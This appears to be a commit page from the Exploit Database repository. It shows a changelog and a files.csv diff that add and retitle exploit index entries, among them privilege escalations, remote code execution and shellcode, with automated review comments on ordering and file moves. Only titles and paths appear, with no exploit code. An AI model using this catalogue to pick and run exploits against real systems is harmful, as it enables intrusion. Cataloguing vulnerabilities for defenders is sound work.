DB: 2016-09-22

6 new exploits

Setuid perl - PerlIO_Debug() Root owned file creation
Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation

Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)

Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit
Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)

Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)

VideoCache 1.9.2 - vccleaner Root
VideoCache 1.9.2 - 'vccleaner' Privilege Escalation

UK One Media CMS - 'id' Error Based SQL Injection
UK One Media CMS - 'id' Error-Based SQL Injection

xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection
xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection

Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)
Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)

Ultimate eShop - Error Based SQL Injection
Ultimate eShop - Error-Based SQL Injection

WordPress Plugin Multiple - timthumb.php Vulnerabilities
Multiple WordPress Plugins - timthumb.php File Upload

Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service

Slackware Linux 3.5 - /etc/group missing results in Root access
Slackware Linux 3.5 - /etc/group Missing Privilege Escalation

Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service

Sudo 1.6.3 - Unclean Environment Variable Root Program Execution
Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation

Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure

Microsoft Office PowerPoint 2010 - Invalid Pointer Reference

Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write

sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass
sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass

Microweber 0.905 - Error Based SQL Injection
Microweber 0.905 - Error-Based SQL Injection

WordPress Theme TimThumb 2.8.13 WebShot Plugin/ - Remote Code Execution
Multiple WordPress Plugins (Using TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution
parent fdd9fd65e2
commit b8ebed3824
7 changed files with 221 additions and 18 deletions
files.csv (39 lines changed)
@ -615,7 +615,7 @@ id,file,description,date,author,platform,type,port
789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service (2)",2005-02-05,CorryL,linux,dos,6667
790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,cgi,webapps,0
791,platforms/linux/local/791.c,"Setuid perl - PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0
792,platforms/linux/local/792.c,"Setuid perl - PerlIO_Debug() Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0
793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0
794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21
795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0
@ -2789,6 +2789,7 @@ id,file,description,date,author,platform,type,port
3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0
3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0
3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0
40404,platforms/php/remote/40404.rb,"Kaltura 11.1.0-2 - Remote Code Execution (Metasploit)",2016-09-21,"Mehmet Ince",php,remote,80
3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0
3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0
3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0
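Review bot: the new 40404 row is inserted between ids 3112 and 3113 rather than after the last entry of files.csv; if the file is meant to stay in id order, append it at the end instead so lookups by id remain monotonic. The row itself is well-formed (eight fields, quoted multi-word author, port 80 for a web-facing Metasploit module).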
@ -8619,7 +8620,7 @@ id,file,description,date,author,platform,type,port
9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - (double ext) Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0
9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0
9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - (ata device) Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Root Exploit",2009-07-13,nofame,linux,local,0
9135,platforms/linux/local/9135.sh,"Openswan 2.4.12/2.6.16 - Insecure Temp File Creation Privilege Escalation",2009-07-13,nofame,linux,local,0
9136,platforms/windows/local/9136.pl,"Mp3-Nator 2.0 - (ListData.dat) Universal Buffer Overflow (SEH)",2009-07-13,"ThE g0bL!N",windows,local,0
9137,platforms/windows/remote/9137.html,"Mozilla Firefox 3.5 - (Font tags) Remote Buffer Overflow",2009-07-13,Sberry,windows,remote,0
9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0
@ -8946,7 +8947,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9009,7 +9010,7 @@ id,file,description,date,author,platform,type,port
9539,platforms/windows/dos/9539.py,"uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos,0
9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0
9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)",2009-08-31,"INetCop Security",linux,local,0
9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' 29-Byte Stack Disclosure (2)",2009-08-31,"Jon Oberheide",linux,local,0
9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Privilege Escalation",2009-08-31,"Ramon Valle",linux,local,0
@ -9749,7 +9750,7 @@ id,file,description,date,author,platform,type,port
10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0
10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
14034,platforms/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0
10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local,0
10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Denial of Service Buffer Overflow",2009-12-16,Connection,windows,dos,0
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
@ -12280,7 +12281,7 @@ id,file,description,date,author,platform,type,port
13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
13932,platforms/windows/remote/13932.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Full System Access",2010-06-18,"Serge Gorbunov",windows,remote,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
13934,platforms/windows/dos/13934.py,"MoreAmp - '.maf' Buffer Overflow (PoC)",2010-06-19,Sid3^effects,windows,dos,0
13935,platforms/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
@ -13115,7 +13116,7 @@ id,file,description,date,author,platform,type,port
15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint - '.bmp' Crash (PoC)",2010-09-18,andrew,windows,dos,0
15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0
15037,platforms/php/webapps/15037.html,"CMSimple - Cross-Site Request Forgery",2010-09-18,Abysssec,php,webapps,0
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' ERROR Based SQL Injection",2010-09-18,secret,php,webapps,0
15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 < 2010 - 'reviews.php' Error-Based SQL Injection",2010-09-18,secret,php,webapps,0
15040,platforms/php/webapps/15040.txt,"Joomla! Component com_restaurantguide - Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0
15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download",2010-09-18,mr_me,php,webapps,0
15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0
@ -14123,7 +14124,7 @@ id,file,description,date,author,platform,type,port
16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,Metasploit,multiple,remote,0
16313,platforms/php/webapps/16313.rb,"FreeNAS - exec_raw.php Arbitrary Command Execution (Metasploit)",2010-11-24,Metasploit,php,webapps,0
16314,platforms/multiple/remote/16314.rb,"Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit)",2010-08-07,Metasploit,multiple,remote,0
16315,platforms/multiple/remote/16315.rb,"Axis2 - / SAP BusinessObjects Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
16315,platforms/multiple/remote/16315.rb,"Axis2 / SAP BusinessObjects - Authenticated Code Execution (via SOAP)",2010-12-14,Metasploit,multiple,remote,0
16316,platforms/multiple/remote/16316.rb,"JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)",2010-08-03,Metasploit,multiple,remote,0
16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit)",2010-12-14,Metasploit,multiple,remote,0
16318,platforms/multiple/remote/16318.rb,"JBoss JMX - Console Deployer Upload and Execute (Metasploit)",2010-10-19,Metasploit,multiple,remote,0
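Review bot: the retitled 16315 row still omits the "(Metasploit)" suffix that 16313, 16314, 16316, 16317 and 16318 carry in this same hunk, and 16312 (the REST variant of the same module, also authored by Metasploit) has the same gap; since 16315 is being edited anyway, append "(Metasploit)" to both Axis2 titles so the naming convention is consistent within the block.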
@ -14967,7 +14968,7 @@ id,file,description,date,author,platform,type,port
17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injections Vulnerabilities",2011-04-22,NoNameMT,php,webapps,0
17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0
17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error Based SQL Injection",2011-04-20,Romka,php,webapps,0
17191,platforms/php/webapps/17191.txt,"Ultimate eShop - Error-Based SQL Injection",2011-04-20,Romka,php,webapps,0
17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0
17193,platforms/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0
17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0
@ -15533,7 +15534,7 @@ id,file,description,date,author,platform,type,port
17869,platforms/php/webapps/17869.txt,"WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion",2011-09-19,"Ben Schmidt",php,webapps,0
17870,platforms/windows/remote/17870.pl,"KnFTP 1.0.0 Server - 'USER' command Remote Buffer Overflow",2011-09-19,mr.pr0n,windows,remote,0
17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
17872,platforms/php/webapps/17872.txt,"WordPress Plugin Multiple - timthumb.php Vulnerabilities",2011-09-19,"Ben Schmidt",php,webapps,0
17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0
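Review bot: the 17872 rewrite narrows the description from "timthumb.php Vulnerabilities" to "timthumb.php File Upload"; that is a change of meaning, not just wording, so confirm against platforms/php/webapps/17872.txt that the advisory covers only the upload issue before committing to the narrower title.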
@ -16522,12 +16523,12 @@ id,file,description,date,author,platform,type,port
19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - TelnetD",1999-01-02,"Tomas Halgas",windows,remote,23
19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0
19385,platforms/windows/dos/19385.txt,"Irfanview 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0
19117,platforms/linux/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",linux,dos,0
19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0
19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",multiple,remote,0
19119,platforms/linux/remote/19119.c,"HP HP-UX 10.34 rlpdaemon - Exploit",1998-07-06,"RSI Advise",linux,remote,0
19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 - Handling of ISINDEX Query",1998-07-06,"Luz Pinto",multiple,remote,0
19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 - Exploit",1998-07-08,"Albert Nubdy",multiple,remote,0
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group missing results in Root access",1998-07-13,"Richard Thomas",linux,local,0
19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - /etc/group Missing Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
19123,platforms/linux/remote/19123.c,"SCO Open Server 5.0.4 - POP Server Buffer Overflow",1998-07-13,"Vit Andrusevich",linux,remote,0
19124,platforms/linux/remote/19124.txt,"HP JetAdmin 1.0.9 Rev. D - symlink",1998-07-15,emffmmadffsdf,linux,remote,0
19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
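Review bot: row 19117 changes its file column from platforms/linux/dos/19117.c to platforms/bsd/dos/19117.c and its platform to bsd, so the source file must be moved in the same commit or the csv will reference a path that does not exist; the other changed files are not rendered on this page, so confirm the move is among the 7 changed files. The title still leads with "Linux Kernel 2.0/2.1" while the platform is now bsd, which is defensible given the mixed OS list but worth a glance. The 19122 retitle in the same hunk is text-only and needs no move.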
@ -16795,7 +16796,7 @@ id,file,description,date,author,platform,type,port
19420,platforms/multiple/remote/19420.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (1)",1999-07-13,"Last Stage of Delirium",multiple,remote,0
19421,platforms/multiple/remote/19421.c,"Caldera OpenUnix 8.0/UnixWare 7.1.1 / HP HP-UX 11.0 / Solaris 7.0 / SunOS 4.1.4 - rpc.cmsd Buffer Overflow (2)",1999-07-13,jGgM,multiple,remote,0
19422,platforms/linux/local/19422.txt,"BMC Software Patrol 3.2.5 - Patrol SNMP Agent File Creation/Permission",1999-07-14,"Andrew Alness",linux,local,0
19423,platforms/multiple/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",multiple,dos,0
19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
19424,platforms/windows/remote/19424.pl,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (1)",1999-07-19,"rain forest puppy",windows,remote,0
19425,platforms/windows/local/19425.txt,"Microsoft Data Access Components (MDAC) 2.1 / Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 / Microsoft Site Server Commerce Edition 3.0 i386 MDAC - RDS (2)",1999-07-19,"Wanderley J. Abreu Jr",windows,local,0
19426,platforms/multiple/remote/19426.c,"SGI Advanced Linux Environment 3.0 / SGI IRIX 6.5.4 / SGI UNICOS 10.0 6 - arrayd.auth Default Configuration",1999-07-19,"Last Stage of Delirium",multiple,remote,0
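Review bot: row 19423 moves from platforms/multiple/dos/19423.c to platforms/bsd/dos/19423.c with the platform column changing from multiple to bsd; this csv edit only works if the file is renamed in the same commit, so verify that the move is included. The systems listed in the title (BSD/OS 4.0, FreeBSD 3.2, NetBSD 1.4) support the bsd classification, but the description still opens with "Linux Kernel 2.3", so the title could be revisited in a later naming pass.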
@ -18516,7 +18517,7 @@ id,file,description,date,author,platform,type,port
21224,platforms/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,lin_x86-64,dos,0
21225,platforms/windows/remote/21225.c,"John Roy Pi3Web 2.0 For Windows - Long Request Buffer Overflow",2002-01-14,aT4r,windows,remote,0
21226,platforms/linux/local/21226.c,"IMLib2 - Home Environment Variable Buffer Overflow",2002-01-13,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Root Program Execution",2002-01-14,"Charles Stevenson",linux,local,0
21227,platforms/linux/local/21227.sh,"Sudo 1.6.3 - Unclean Environment Variable Privilege Escalation",2002-01-14,"Charles Stevenson",linux,local,0
21228,platforms/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",windows,dos,0
21229,platforms/linux/local/21229.txt,"AT 3.1.8 - Formatted Time Heap Overflow",2002-01-16,"SuSE Security",linux,local,0
21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0
@ -19399,7 +19400,7 @@ id,file,description,date,author,platform,type,port
22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Privilege Escalation",2003-01-06,"Carl Livitt",linux,local,0
22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0
22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x / FreeBSD 4.x - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0
22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 - Fontview Denial of Service",2003-01-06,andrew,windows,dos,0
22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - Default_Theme Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps,0
22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0
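Review bot: row 22131 changes its path from platforms/unix/remote/22131.pl to platforms/bsd/remote/22131.pl and its platform from unix to bsd, which again requires the script itself to be moved in this commit; check that the rename is part of the change set. Note that 22129 two lines above keeps the "Remote Root Exploit" wording that this commit replaces with "Privilege Escalation" elsewhere, so the normalisation is not yet complete in this region.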
@ -20240,6 +20241,7 @@ id,file,description,date,author,platform,type,port
22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0
22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0
22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0
40406,platforms/windows/dos/40406.txt,"Microsoft Office PowerPoint 2010 - Invalid Pointer Reference",2016-09-21,"Google Security Research",windows,dos,0
22983,platforms/hardware/dos/22983.txt,"HP Compaq Insight Management Agent 5.0 - Format String",2003-08-04,mcw@wcd.se,hardware,dos,0
22984,platforms/linux/local/22984.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (1)",2003-08-04,V9,linux,local,0
22985,platforms/linux/local/22985.c,"Xtokkaetama 1.0 b-6 - Nickname Local Buffer Overflow (2)",2003-08-04,techieone@softhome.net,linux,local,0
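Review bot: the new 40406 row is dropped between 22982 and 22983, in the middle of the 2003 entries, rather than after the highest existing id; unless files.csv is deliberately unordered, append new rows at the end so the 404xx ids added in this commit stay together and id-based lookups remain monotonic.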
@ -20269,6 +20271,7 @@ id,file,description,date,author,platform,type,port
23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0
23022,platforms/php/local/23022.c,"PHP 4.x - DLOpen Memory Disclosure (1)",2003-08-13,"Andrew Griffiths",php,local,0
23023,platforms/php/local/23023.c,"PHP 4.x - DLOpen Memory Disclosure (2)",2003-08-13,andrewg,php,local,0
40405,platforms/multiple/dos/40405.txt,"Symantec rar Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0
23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0
23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0
23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0
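Review bot: 40405 is filed as multiple/dos, while the advisory text added in this same commit describes the two unrar bugs as remote code execution at the highest possible privilege level; if "dos" is chosen because the entry ships only a crash PoC archive, that should be a deliberate classification (the 40406 row in this commit follows the same pattern), not a default. Like the other new rows, it is also inserted mid-file, between 23023 and 23024, instead of after the last entry.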
@ -22303,7 +22306,7 @@ id,file,description,date,author,platform,type,port
25131,platforms/windows/local/25131.py,"WinArchiver 3.2 - Buffer Overflow (SEH)",2013-05-01,RealPentesting,windows,local,0
25132,platforms/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote,0
25133,platforms/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURemote Code Execution Bypass",2013-05-01,aeon,linux,local,0
25134,platforms/linux/local/25134.c,"sudo 1.8.0 < 1.8.3p1 (sudo_debug) - Privilege Escalation + glibc FORTIFY_SOURCE Bypass",2013-05-01,aeon,linux,local,0
25135,platforms/windows/dos/25135.txt,"Syslog Watcher Pro 2.8.0.812 - (Date Parameter) Cross-Site Scripting",2013-05-01,demonalex,windows,dos,0
25136,platforms/php/remote/25136.rb,"phpMyAdmin - Authenticated Remote Code Execution via preg_replace()",2013-05-01,Metasploit,php,remote,0
